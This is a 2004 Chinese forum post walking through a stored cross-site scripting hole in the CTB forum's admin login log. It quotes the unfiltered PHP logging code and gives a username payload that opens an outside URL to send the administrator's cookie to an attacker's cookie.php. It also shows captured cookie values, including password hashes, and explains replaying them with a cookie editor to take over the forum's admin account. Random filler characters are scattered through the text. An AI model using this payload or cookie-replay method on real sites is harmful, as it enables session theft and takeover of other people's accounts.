QQ登录

只需要一步,快速开始

 注册地址  找回密码
查看: 2493|回复: 0
打印 上一主题 下一主题

CTB论坛再探

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2004-10-6 12:02 |只看该作者 |倒序浏览
|招呼Ta 关注Ta
在CTB论坛中对前台和后台登陆的情况都设置了一个日志记录供管理员查看,可以让管理员尽快发现论坛是否被人入侵。但是对于用户递交的数据没有进行任何处理就记录到了日志当中,我们可以通过递交特殊的语句来进行跨站攻击,从而直接得到密码。 : q1 I& U& i3 y- x. T , w& Z+ p" v7 Z/ ^* h  我们看看admin目录下的login.php文件的日志处理部分的代码: ! N, Z9 f6 I( K' a: ~7 q8 j ! h( w( ]4 K! P: G- [- f代码: $ s7 D# R7 `7 l8 Y-------------------------------------------------------------------------------- % A8 @8 |1 d% g- @ 7 S% p6 p' O" [ |! O3 o# K3 h5 z//后台管理员登陆日志 & f' u" x/ M9 c& U3 d function adminLoginLog($check="ok") 4 I! J: }8 E9 N% U; r. [8 L9 G { / P! c0 A: D2 {; C if($this->set[logRecord] == "N"){ ' n5 l* b* c5 j9 H" y5 x9 p return false; 8 ^, I: v1 J& `; [$ P; e } / }# i3 n4 z2 e! W/ f- p! j $msgArray[phpCode] = $this->code; 5 Y4 \, @3 U& p+ ~: Z8 O' N- x //判断文件大小是否需要清空 2 w' q/ Y$ E, ?* W) U: g; P7 \$ L if (filesize("../".$this->set['dataPath']."/log_adminlogin.php") > $this->set['logRecordSize']){ 8 ^8 e# g6 a) S, ^% k4 { $this->file = "../".$this->set['dataPath']."/log_adminlogin.php"; ) A; s' \- x, P( c2 T. ?; k+ v $this->null_write(""); 5 B7 I- n- e+ P A( U/ {, q } ! U3 U$ H- R0 {/ \: Z: l. T //登陆错误 2 f$ h( {! |6 U* o //省去部分代码........ : X/ X! M' G9 B2 W/ V //登陆失败 $ a" _# \4 D* b9 ^' R. ] else { : b; o8 @8 E M/ _) b. a7 b $msgArray[loginMode] = 0; 8 C0 g' d) K0 q $msgArray[loginId] = $this->input['userName']; & }) N# D: V, F$ r' k% w $msgArray[wrongMsg] = $check; " k! r- d+ A" N" p $msgArray[userIp] = $this->ip; 4 X% V, \* I8 D6 f/ W/ i% v $msgArray[loginTime] = time(); 8 c! z2 M0 J: O+ _" D $msgArray[temp1] = ""; //备用 * x/ k/ X8 v& k8 K# o$ l0 W* {6 R9 ~$ Z $msgArray[temp2] = ""; //备用 4 c1 ?5 V+ O* ^6 I: y( X $this->file = "../".$this->set['dataPath']."/log_adminlogin.php"; 5 j; i9 ~. g# ~1 S, t& [/ l4 } $this->add_line($msgArray); : ]( \! s/ f( X/ h) R } 0 s! A9 @: g2 L, `1 Z- {* U} - _2 x- o8 h- q( K( G5 W" {* B 9 {8 C1 @# e- i5 O, K9 K -------------------------------------------------------------------------------- # Y* G8 t, _* p $ z! [2 ?: E6 m5 }% U' e  从代码上看我们递交的用户名等信息既不会进行任何过滤也无论正确与否都会被保存到log_adminlogin.php里去,当管理员登陆到后台查看日志的时候就会显示出log_adminlogin.php里面记录的登陆信息,我们也就可以通过这个方法来得到管理员的ID和密码等信息。 % O9 o8 B" w' w" |6 X* k. v 2 O4 Y. x4 a* A; C6 O   我们打开后台登陆页面,在用户名那里输入: 7 T* D! V2 V* d: L6 U/ f; ]! N1 w: H, G4 r# P6 d0 ^; }, e 代码: * G) e# r3 G0 q; K' z* C8 p -------------------------------------------------------------------------------- 9 O: T- i& k" G 7 ] s$ P# Q1 z' F4 @) U7 P<img src="javascript:window.open('http://192.168.1.1/cookie.php?'+document.cookie)"> * A* x% x8 o }8 _: t% E1 f# i- k5 G% J# X -------------------------------------------------------------------------------- ! \: s# J U/ I/ V+ V* y/ A 9 B$ k' B# B: R; L7 {/ T3 y2 W, I  因为无论登陆成功否,程序都会进行记录,所以密码我们可以随便填。其中192.168.1.1为我们放置cookie.php的网址,cookie.php为一个可以获得cookie信息的PHP文件。现在我们要做的就是等了,只要管理员一查看后台登陆日志,我们的PHP程序就会把他的COOKIE截取下来。 5 n# F6 B& L3 ? ) f% A6 B) D3 ^" u. ?/ e- t9 N. i  让我们看看截取到的文件内容: 5 @7 |- @1 `- x7 Y/ z1 ?3 M 6 ?$ C% m6 A) R, y, V$ I( L 引用: # k- t! h. i# g) J' ?; f -------------------------------------------------------------------------------- $ E9 p% d" f+ f- u& [4 r* y' g& i; O0 @ ctb_user_login=ctb;%20ctb_user_pass=ce445102682e75bf533d44e1afc38a90;%20ctb_login_mode=1;%20eremite=0;%20skins=2;%20fylinklinkfylogin=cpb;%20userpass=2BA2A8AC968A7A2B0A7BAA7F2FEF18D2;%20username=sniper;%20Dwebdv=userid=1&usercookies=2&userhidden=&password=0reu3g775VrY7458&userclass=%B9%DC%C0%ED%D4%B1&username=admin&StatUserID=3980383;%20TZ=480;%20PHPSESSID=d8765179dc4f3a8708515a031216e503 4 v6 A' c3 `1 ]7 y# p # c- e6 F9 i. q+ z-------------------------------------------------------------------------------- 0 x# H/ p/ C( c2 ] . F I9 x: S4 B8 o4 i4 G   我们需要只有ctb_user_login、ctb_user_pass和ctb_login_mode三个就可以得到前台管理权限了,有了这些信息,我们要获得前台管理员权限就非常容易,用IECookieView找到我们要编辑的COOKIE,把相应的部分替换掉,保存后再进入该站点你就是前台管理员了。 " F) n V4 m- @) W 3 U1 s/ O$ M) F; R* M   很简单的我们就得到了论坛的管理权限,如果被人利用,那么相信后果是非常严重的,希望用CTB论坛的朋友关注他们的官方站点的补丁发布情况,尽快修补该漏洞,以免造成不必要的损失。 ( L4 g8 n$ o' s

zan
转播转播0 分享淘帖0 分享分享0 收藏收藏0 支持支持0 反对反对0 微信微信
您需要登录后才可以回帖 登录 | 注册地址

qq
收缩
  • 电话咨询

  • 04714969085
fastpost

关于我们| 联系我们| 诚征英才| 对外合作| 产品服务| QQ

手机版|Archiver| |繁體中文 手机客户端  

蒙公网安备 15010502000194号

Powered by Discuz! X2.5   © 2001-2013 数学建模网-数学中国 ( 蒙ICP备14002410号-3 蒙BBS备-0002号 )     论坛法律顾问:王兆丰

GMT+8, 2026-4-18 22:12 , Processed in 0.354080 second(s), 52 queries .

回顶部